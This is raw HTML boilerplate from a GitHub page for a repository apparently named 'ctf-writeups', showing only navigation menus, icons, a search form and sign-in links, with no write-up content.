<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-codespaces color-fg-subtle mr-3"> <path d="M3.5 3.75C3.5 2.784 4.284 2 5.25 2h13.5c.966 0 1.75.784 1.75 1.75v7.5A1.75 1.75 0 0 1 18.75 13H5.25a1.75 1.75 0 0 1-1.75-1.75Zm-2 12c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v4a1.75 1.75 0 0 1-1.75 1.75H3.25a1.75 1.75 0 0 1-1.75-1.75ZM5.25 3.5a.25.25 0 0 0-.25.25v7.5c0 .138.112.25.25.25h13.5a.25.25 0 0 0 .25-.25v-7.5a.25.25 0 0 0-.25-.25Zm-2 12a.25.25 0 0 0-.25.25v4c0 .138.112.25.25.25h17.5a.25.25 0 0 0 .25-.25v-4a.25.25 0 0 0-.25-.25Z"></path><path d="M10 17.75a.75.75 0 0 1 .75-.75h6.5a.75.75 0 0 1 0 1.5h-6.5a.75.75 0 0 1-.75-.75Zm-4 0a.75.75 0 0 1 .75-.75h.5a.75.75 0 0 1 0 1.5h-.5a.75.75 0 0 1-.75-.75Z"></path></svg> <div> <div class="color-fg-default h4">Codespaces</div> Instant dev environments </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-copilot color-fg-subtle mr-3"> <path d="M9.75 14a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Zm4.5 0a.75.75 0 0 1 .75.75v2.5a.75.75 0 0 1-1.5 0v-2.5a.75.75 0 0 1 .75-.75Z"></path><path d="M12 2c2.214 0 4.248.657 5.747 1.756.136.099.268.204.397.312.584.235 1.077.546 1.474.952.85.869 1.132 2.037 1.132 3.368 0 .368-.014.733-.052 1.086l.633 1.478.043.022A4.75 4.75 0 0 1 24 15.222v1.028c0 .529-.309.987-.565 1.293-.28.336-.636.653-.966.918a13.84 13.84 0 0 1-1.299.911l-.024.015-.006.004-.039.025c-.223.135-.45.264-.68.386-.46.245-1.122.571-1.941.895C16.845 21.344 14.561 22 12 22c-2.561 0-4.845-.656-6.479-1.303a19.046 19.046 0 0 1-1.942-.894 14.081 14.081 0 0 1-.535-.3l-.144-.087-.04-.025-.006-.004-.024-.015a13.16 13.16 0 0 1-1.299-.911 6.913 6.913 0 0 1-.967-.918C.31 17.237 0 16.779 0 16.25v-1.028a4.75 4.75 0 0 1 2.626-4.248l.043-.022.633-1.478a10.195 10.195 0 0 1-.052-1.086c0-1.331.282-2.498 1.132-3.368.397-.406.89-.717 1.474-.952.129-.108.261-.213.397-.312C7.752 2.657 9.786 2 12 2Zm-8 9.654v6.669a17.59 17.59 0 0 0 2.073.98C7.595 19.906 9.686 20.5 12 20.5c2.314 0 4.405-.594 5.927-1.197a17.59 17.59 0 0 0 2.073-.98v-6.669l-.038-.09c-.046.061-.095.12-.145.177-.793.9-2.057 1.259-3.782 1.259-1.59 0-2.738-.544-3.508-1.492a4.323 4.323 0 0 1-.355-.508h-.344a4.323 4.323 0 0 1-.355.508C10.704 12.456 9.555 13 7.965 13c-1.725 0-2.989-.359-3.782-1.259a3.026 3.026 0 0 1-.145-.177Zm6.309-1.092c.445-.547.708-1.334.851-2.301.057-.357.087-.718.09-1.079v-.031c-.001-.762-.166-1.26-.43-1.568l-.008-.01c-.341-.391-1.046-.689-2.533-.529-1.505.163-2.347.537-2.824 1.024-.462.473-.705 1.18-.705 2.32 0 .605.044 1.087.135 1.472.092.384.231.672.423.89.365.413 1.084.75 2.657.75.91 0 1.527-.223 1.964-.564.14-.11.268-.235.38-.374Zm2.504-2.497c.136 1.057.403 1.913.878 2.497.442.545 1.134.938 2.344.938 1.573 0 2.292-.337 2.657-.751.384-.435.558-1.151.558-2.361 0-1.14-.243-1.847-.705-2.319-.477-.488-1.318-.862-2.824-1.025-1.487-.161-2.192.139-2.533.529-.268.308-.437.808-.438 1.578v.02c.002.299.023.598.063.894Z"></path></svg> <div> <div class="color-fg-default h4">Copilot</div> Write better code with AI </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-code-review color-fg-subtle mr-3"> <path d="M10.3 6.74a.75.75 0 0 1-.04 1.06l-2.908 2.7 2.908 2.7a.75.75 0 1 1-1.02 1.1l-3.5-3.25a.75.75 0 0 1 0-1.1l3.5-3.25a.75.75 0 0 1 1.06.04Zm3.44 1.06a.75.75 0 1 1 1.02-1.1l3.5 3.25a.75.75 0 0 1 0 1.1l-3.5 3.25a.75.75 0 1 1-1.02-1.1l2.908-2.7-2.908-2.7Z"></path><path d="M1.5 4.25c0-.966.784-1.75 1.75-1.75h17.5c.966 0 1.75.784 1.75 1.75v12.5a1.75 1.75 0 0 1-1.75 1.75h-9.69l-3.573 3.573A1.458 1.458 0 0 1 5 21.043V18.5H3.25a1.75 1.75 0 0 1-1.75-1.75ZM3.25 4a.25.25 0 0 0-.25.25v12.5c0 .138.112.25.25.25h2.5a.75.75 0 0 1 .75.75v3.19l3.72-3.72a.749.749 0 0 1 .53-.22h10a.25.25 0 0 0 .25-.25V4.25a.25.25 0 0 0-.25-.25Z"></path></svg> <div> <div class="color-fg-default h4">Code review</div> Manage code changes </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-issue-opened color-fg-subtle mr-3"> <path d="M12 1c6.075 0 11 4.925 11 11s-4.925 11-11 11S1 18.075 1 12 5.925 1 12 1ZM2.5 12a9.5 9.5 0 0 0 9.5 9.5 9.5 9.5 0 0 0 9.5-9.5A9.5 9.5 0 0 0 12 2.5 9.5 9.5 0 0 0 2.5 12Zm9.5 2a2 2 0 1 1-.001-3.999A2 2 0 0 1 12 14Z"></path></svg> <div> <div class="color-fg-default h4">Issues</div> Plan and track work </div>
<svg aria-hidden="true" height="24" viewBox="0 0 24 24" version="1.1" width="24" data-view-component="true" class="octicon octicon-comment-discussion color-fg-subtle mr-3"> <path d="M1.75 1h12.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 14.25 14H8.061l-2.574 2.573A1.458 1.458 0 0 1 3 15.543V14H1.75A1.75 1.75 0 0 1 0 12.25v-9.5C0 1.784.784 1 1.75 1ZM1.5 2.75v9.5c0 .138.112.25.25.25h2a.75.75 0 0 1 .75.75v2.19l2.72-2.72a.749.749 0 0 1 .53-.22h6.5a.25.25 0 0 0 .25-.25v-9.5a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25Z"></path><path d="M22.5 8.75a.25.25 0 0 0-.25-.25h-3.5a.75.75 0 0 1 0-1.5h3.5c.966 0 1.75.784 1.75 1.75v9.5A1.75 1.75 0 0 1 22.25 20H21v1.543a1.457 1.457 0 0 1-2.487 1.03L15.939 20H10.75A1.75 1.75 0 0 1 9 18.25v-1.465a.75.75 0 0 1 1.5 0v1.465c0 .138.112.25.25.25h5.5a.75.75 0 0 1 .53.22l2.72 2.72v-2.19a.75.75 0 0 1 .75-.75h2a.25.25 0 0 0 .25-.25v-9.5Z"></path></svg> <div> <div class="color-fg-default h4">Discussions</div> Collaborate outside of code </div>
Explore
All features
Documentation
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
GitHub Skills
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Blog
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Solutions <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4"> For
Enterprise
Teams
Startups
Education
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
By Solution
CI/CD & Automation
DevOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
DevSecOps
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
Case Studies
Customer Stories
Resources
<svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-link-external HeaderMenu-external-icon color-fg-subtle"> <path d="M3.75 2h3.5a.75.75 0 0 1 0 1.5h-3.5a.25.25 0 0 0-.25.25v8.5c0 .138.112.25.25.25h8.5a.25.25 0 0 0 .25-.25v-3.5a.75.75 0 0 1 1.5 0v3.5A1.75 1.75 0 0 1 12.25 14h-8.5A1.75 1.75 0 0 1 2 12.25v-8.5C2 2.784 2.784 2 3.75 2Zm6.854-1h4.146a.25.25 0 0 1 .25.25v4.146a.25.25 0 0 1-.427.177L13.03 4.03 9.28 7.78a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042l3.75-3.75-1.543-1.543A.25.25 0 0 1 10.604 1Z"></path></svg>
</div>
<button type="button" class="HeaderMenu-link border-0 width-full width-lg-auto px-0 px-lg-2 py-3 py-lg-2 no-wrap d-flex flex-items-center flex-justify-between js-details-target" aria-expanded="false"> Open Source <svg opacity="0.5" aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-chevron-down HeaderMenu-icon ml-1"> <path d="M12.78 5.22a.749.749 0 0 1 0 1.06l-4.25 4.25a.749.749 0 0 1-1.06 0L3.22 6.28a.749.749 0 1 1 1.06-1.06L8 8.939l3.72-3.719a.749.749 0 0 1 1.06 0Z"></path></svg> </button> <div class="HeaderMenu-dropdown dropdown-menu rounded m-0 p-0 py-2 py-lg-4 position-relative position-lg-absolute left-0 left-lg-n3 px-lg-4">
<div> <div class="color-fg-default h4">GitHub Sponsors</div> Fund open source developers </div>
<div> <div class="color-fg-default h4">The ReadME Project</div> GitHub community articles </div>
Repositories
Topics
Trending
Collections
</div>
Pricing
</nav>
<div class="d-lg-flex flex-items-center px-3 px-lg-0 mb-3 mb-lg-0 text-center text-lg-left"> <div class="d-lg-flex min-width-0 mb-2 mb-lg-0">
<div class="header-search flex-auto position-relative js-site-search flex-self-stretch flex-md-self-auto mb-3 mb-md-0 mr-0 mr-md-3 scoped-search site-scoped-search js-jump-to"> <div class="position-relative"> </option></form><form class="js-site-search-form" role="search" aria-label="Site" data-scope-type="Repository" data-scope-id="162845937" data-scoped-search-url="/KEERRO/ctf-writeups/search" data-owner-scoped-search-url="/users/KEERRO/search" data-unscoped-search-url="/search" data-turbo="false" action="/KEERRO/ctf-writeups/search" accept-charset="UTF-8" method="get"> <label class="form-control header-search-wrapper input-sm p-0 js-chromeless-input-container header-search-wrapper-jump-to position-relative d-flex flex-justify-between flex-items-center"> <input type="text" class="form-control js-site-search-focus header-search-input jump-to-field js-jump-to-field js-site-search-field is-clearable" data-hotkey=s,/ name="q" placeholder="Search" data-unscoped-placeholder="Search GitHub" data-scoped-placeholder="Search" autocapitalize="off" role="combobox" aria-haspopup="listbox" aria-expanded="false" aria-autocomplete="list" aria-controls="jump-to-results" aria-label="Search" data-jump-to-suggestions-path="/_graphql/GetSuggestedNavigationDestinations" spellcheck="false" autocomplete="off" > <input type="hidden" data-csrf="true" class="js-data-jump-to-suggestions-path-csrf" value="rc0g+N85d1d2j2b0MOTAM8FeDfdiiL7zMHHlKgD5if4vxHpFY3dYAPItvgyWoQXAnxElYxlNRmrFcHXWjWPCbQ==" /> <input type="hidden" class="js-site-search-type-field" name="type" > <svg xmlns="http://www.w3.org/2000/svg" width="22" height="20" aria-hidden="true" class="mr-1 header-search-key-slash"><path fill="none" stroke="#979A9C" opacity=".4" d="M3.5.5h12c1.7 0 3 1.3 3 3v13c0 1.7-1.3 3-3 3h-12c-1.7 0-3-1.3-3-3v-13c0-1.7 1.3-3 3-3z"></path><path fill="#979A9C" d="M11.8 6L8 15.1h-.9L10.8 6h1z"></path></svg>
<div class="Box position-absolute overflow-hidden d-none jump-to-suggestions js-jump-to-suggestions-container">
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<span>No suggested jump to results</span>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this user </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
<div class="jump-to-octicon js-jump-to-octicon flex-shrink-0 mr-2 text-center d-none"> <svg title="Repository" aria-label="Repository" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-repo js-jump-to-octicon-repo d-none flex-shrink-0"> <path d="M2 2.5A2.5 2.5 0 0 1 4.5 0h8.75a.75.75 0 0 1 .75.75v12.5a.75.75 0 0 1-.75.75h-2.5a.75.75 0 0 1 0-1.5h1.75v-2h-8a1 1 0 0 0-.714 1.7.75.75 0 1 1-1.072 1.05A2.495 2.495 0 0 1 2 11.5Zm10.5-1h-8a1 1 0 0 0-1 1v6.708A2.486 2.486 0 0 1 4.5 9h8ZM5 12.25a.25.25 0 0 1 .25-.25h3.5a.25.25 0 0 1 .25.25v3.25a.25.25 0 0 1-.4.2l-1.45-1.087a.249.249 0 0 0-.3 0L5.4 15.7a.25.25 0 0 1-.4-.2Z"></path></svg> <svg title="Project" aria-label="Project" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path d="M1.75 0h12.5C15.216 0 16 .784 16 1.75v12.5A1.75 1.75 0 0 1 14.25 16H1.75A1.75 1.75 0 0 1 0 14.25V1.75C0 .784.784 0 1.75 0ZM1.5 1.75v12.5c0 .138.112.25.25.25h12.5a.25.25 0 0 0 .25-.25V1.75a.25.25 0 0 0-.25-.25H1.75a.25.25 0 0 0-.25.25ZM11.75 3a.75.75 0 0 1 .75.75v7.5a.75.75 0 0 1-1.5 0v-7.5a.75.75 0 0 1 .75-.75Zm-8.25.75a.75.75 0 0 1 1.5 0v5.5a.75.75 0 0 1-1.5 0ZM8 3a.75.75 0 0 1 .75.75v3.5a.75.75 0 0 1-1.5 0v-3.5A.75.75 0 0 1 8 3Z"></path></svg> <svg title="Search" aria-label="Search" role="img" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-search js-jump-to-octicon-search d-none flex-shrink-0"> <path d="M10.68 11.74a6 6 0 0 1-7.922-8.982 6 6 0 0 1 8.982 7.922l3.04 3.04a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215ZM11.5 7a4.499 4.499 0 1 0-8.997 0A4.499 4.499 0 0 0 11.5 7Z"></path></svg> </div>
<div class="jump-to-suggestion-name js-jump-to-suggestion-name flex-auto overflow-hidden text-left no-wrap css-truncate css-truncate-target"> </div>
<div class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none js-jump-to-badge-search"> <span> In this repository </span> <span> All GitHub </span> <span>↵</span> </div>
<div aria-hidden="true" class="border rounded-2 flex-shrink-0 color-bg-subtle px-1 color-fg-muted ml-1 f6 d-none d-on-nav-focus js-jump-to-badge-jump"> Jump to <span>↵</span> </div>
</div> </label></form> </div></div>
</div>
<div class="position-relative mr-lg-3 d-lg-inline-block"> Sign in </div>
Sign up </div> </div> </div> </div></header>
</div>
<div id="start-of-content" class="show-on-focus"></div>
<div id="js-flash-container" data-turbo-replace>
<template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" > <button autofocus class="flash-close js-flash-close" type="button" aria-label="Dismiss this message"> <svg aria-hidden="true" height="16" viewBox="0 0 16 16" version="1.1" width="16" data-view-component="true" class="octicon octicon-x"> <path d="M3.72 3.72a.75.75 0 0 1 1.06 0L8 6.94l3.22-3.22a.749.749 0 0 1 1.275.326.749.749 0 0 1-.215.734L9.06 8l3.22 3.22a.749.749 0 0 1-.326 1.275.749.749 0 0 1-.734-.215L8 9.06l-3.22 3.22a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042L6.94 8 3.72 4.78a.75.75 0 0 1 0-1.06Z"></path></svg> </button> <div aria-atomic="true" role="alert" class="js-flash-alert"> <div>{{ message }}</div>
</div> </div></div> </template></div>
<include-fragment class="js-notification-shelf-include-fragment" data-base-src="https://github.com/notifications/beta/shelf"></include-fragment>
<div class="application-main " data-commit-hovercards-enabled data-discussion-hovercards-enabled data-issue-and-pr-hovercards-enabled > <div itemscope itemtype="http://schema.org/SoftwareSourceCode" class=""> <main id="js-repo-pjax-container" >
<div id="repository-container-header" class="pt-3 hide-full-screen" style="background-color: var(--color-page-header-bg);" data-turbo-replace>
